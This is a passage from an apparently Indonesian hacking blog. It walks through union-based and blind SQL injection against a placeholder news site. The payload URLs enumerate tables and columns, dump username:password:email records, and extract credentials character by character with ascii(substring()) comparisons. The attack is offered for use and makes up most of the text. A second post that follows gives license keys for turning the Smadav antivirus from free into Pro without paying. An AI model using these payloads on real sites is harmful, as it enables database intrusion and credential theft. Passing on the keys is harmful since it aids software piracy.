ditampilkan di layar. sekarang kita harus menambahkan LIMIT pada akhir dari query untuk mengeluarkan semua daftar table.

i.e http: /www. situs. com/news. php? id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Catat bahwa saya menulis 0,1 (memperoleh 1 hasil permulaan dari 0th)
sekarang untuk melihat table yang kedua,kita merubah limit 0,1 ke limit 1,1

i.e

http: /www. situs. com/news. php? id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

table kedua telah ditampilkan.

untuk table ketiga kita tuliskan limit 2,1

i.e

http: /www. situs. com/news. php? id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

simpan incrementing sampai kamu memperoleh info berguna seperti db_admin, poll_user, auth, auth_user :D

untuk memperoleh kolom metodenya sama.

disini kita menggunakan column_name and information_schema.columns

metode sama seperti di atas contohnya seperti:

http: /www. situs. com/news. php? id=5 all select 1,column_name,3 from information_schema.columns limit 0,1/*

kolom pertama telah terlihat.

yang kedua (kita rubah limit 0,1 ke limit 1,1) yaitu :

i.e

http: /www. situs. com/news. php? id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

kolom kedua terlah terlihat jadi simpan incrementing sampai kamu memperoleh sesuatu seperti

username,user,login, password, pass, passwd dan lain-lain. . . :D

jika kamu ingin menampilkan nama kolom untuk table khusus gunakan query ini. (dimana anak kalimat)

Kira-kira kita menemukan table users itu.

i.e

http: /www. situs. com/berita. php? id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

sekarang kita memperoleh tampilan nama kolom di table users. hanya menggunakan LIMIT kita mendapatkan semua daftar kolom di table users.

NOTE : ini tidak mau bekerja jika magic quotes = ON

Kira-kira kita menemukan colums user, pass dan email.

Sekarang untuk menyelesaikan query untuk meletakkan mereka bersama-sama :D

untuk itu kita menggunakan concat() , i decribe dulu.

i.e

http: /www. situs. com/news. php? id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

apa kita dapat disini adalah user:pass:email dari table users.

contoh: admin:hash :emailnya@situs.com

itulah isi semua bagian itu, sekarang kami dapat memproses ke bagian yang lebih keras : )

2. Blind SQL Injection

Blind injection ini agak rumit injeksi klasik tetapi ini bisa dilakukan :D

saya harus katakan, ada tutorial blind sql injection yang sangat baik oleh xprog, tidak jelek untuk membaca ini :D

Mari kita mulai dengan bahan lanjutan.

saya akan menggunakan contoh kita

http: /www. situs. com/news. php? id=5

bila kita menjalankan ini, kita lihat halaman dan artikel pada halaman itu, gambar-gambar dan lain-lain. . .

kemudian bila kita ingin mencoba ini untuk serangan blind sql injection

http: /www. situs. com/news. php? id=5 and 1=1 <--- ini selalu benar dan tampilan halaman normal, itu pertanda baik. Sekarang percobaan nyata http: /www. situs. com/news. php? id=5 and 1=2 <--- ini adalah salah jadi jika teks? gambar atau isi hilang di halaman maka situs itu vulnerable untuk blind sql injection. 1) memperoleh versi mysql Untuk memperoleh versi serangan blind kami menggunakan substring i.e http: /www. situs. com/news. php? id=5 and substring(@@version,1,1)=4 ini akan menampilkan TRUE jika versi mysql 4. gantikan 4 dengan 5 dan jika query menampilkan TRUE jika versi 5. i.e http: /www. situs. com/news. php? id=5 and substring(@@version,1,1)=5 2) Test jika subselect bekerja bila select tidak bekerja, kita menggunakan subselect i.e http: /www. situs. com/berita. php? id=5 and (select 1)=1 jika tampilan halaman normal berarti subselect bekerja. kemudian kita ingin lihat jika kita punya akses ke mysql.user i.e http: /www. situs. com/news. php? id=5 (select 1 from mysql.user limit 0,1)=1 jika tampilan halaman normal berarti kita punya akses ke mysql.user dan kemudian nanti kita dapat menarik password menggunakan load_file() function dan OUTFILE 3) cek table dan nama kolom bagian ini bila menebak teman terbaik : ) i.e http: /www. situs. com/news. php? id=5 and (select 1 from users limit 0,1)=1 (dengan limit 0,1 query kita disini menampilkan 1 baris data, sebab subselect menampilkan hanya 1 baris, ini sangat penting. ) kemudian jika tampilan halaman normal tanpa isi hilang, berarti ada table user . jika kamu memperoleh FALSE ( artikel hilang), kita hanya merubah table name sampai kamu dapat 1 yang benar : ) seumpama kita telah menemukan table name itu adalah users, sekarang apa kita butuhkan adalah nama kolom. sama halnya table name, kita mulai menebak. Seperti yang saya katakan sebelumnya cobalah untuk nama biasa untuk kolom. i.e http: /www. situs. com/news. php? id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 jika tampilan halaman normal kita mengetahui bahwa nama kolom adalah password jika kita memperoleh FALSE cobalah nama biasa atau hanya mengira-ngira disini kami menggabungkan 1 dengan password kolom, kemudian substring kembali ke karakter pertama (,1,1) 4) Menarik data dari database Kita menemukan table users i columns username password jadi kita ingin menarik karakter-karakter dari itu. http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

OK ini menarik karakter pertama dari pengguna pertama di table users.

substring disini menampilkan karakter pertama dan 1 karakter di lenght. Ascii() mengkonversikan 1 karakter ke nilai ascii

kemudian bandingkan ini dengan simbol lebih besar dari >.

jika ascii char lebih besar dari 80, tampilan halaman normal. (TRUE)

kita terus mencoba sampai kita memperoleh false.

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

kami memperoleh TRUE, simpan incrementing

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE lagi,lebih tinggi

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

False! ! !

Jadi karakter pertama di username adalah char(99) gunakan ascii konvertor kita tahu bahwa char(99) adalah 'c'.

kemudian mari kita memeriksa karakter yang kedua.

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 Ingat bahwa saya merubah ,1,1 to ,2,1 untuk memperoleh karakter yang kedua. (sekarang ini menampilkan karakter yang kedua, 1 karakter di lenght

http: /www. situs. com/berita. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, tampilan halaman normal, lebih tinggi

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

False, nomor lebih rendah.

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE,lebih tinggi.

http: /www. situs. com/berita. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE! ! !

Kita mengetahui bahwa karakter yang kedua adalah char(105) dan itu adalah 'i'.
Kita punya 'ci' saat ini

Simpan incrementing sampai kamu memperoleh akhir. (bila >0 menampilkan salah kita mengetahui bahwa kita telah mencapai akhir).

ada beberapa alat-alat untuk Blind SQL Injection, saya pikir sqlmap adalah yang terbaik, tetapi saya melakukannya dengan manual

sebab itu membuat kamu lebih baik dari sql injektor :D

30 November 2010

Cara Membuat Smadav Free Menjadi Pro

Smadav Anda free?? Hahahaha.... Ga jaman kaleee pake yang free!!

Blog www.andhikaveraza.com akan mengajarkan Anda bagaimana membuat Smadav Anda yang free menjadi PRO!!



Gak usah lama, saya langsung kepermasalahan nya :


Panduan instalasi key Smadav 8.3

1. Aktifkan Smadav 8.3

2. Jika ada tulisan smadav anda di Blacklist, tidak usah khawatir


3. Lalu setelah instalasi selesai, klik tombol SETTING

4. Setelah itu, pada Registrasi Smadav Pro, masukan seperti ini :
Nama : anti-pembajakan
Key : (dikosongkan saja, jangan diisi)

5. Klik register

6. Lalu setelah itu, masukan salah satu dari 3 nama key di bawah ini:

Type Warnet (Lebih dari 1 Komputer)
Nama : http://marcellinoagatha.blogspot.com
Key : 775877810985

Type Perusahaan (Lebih dari 100 Komputer)
Nama : www.marcellinoagatha.blogspot.com
Key : 991999604080

HASILNYA SEPERTI MILIK SAYA!! :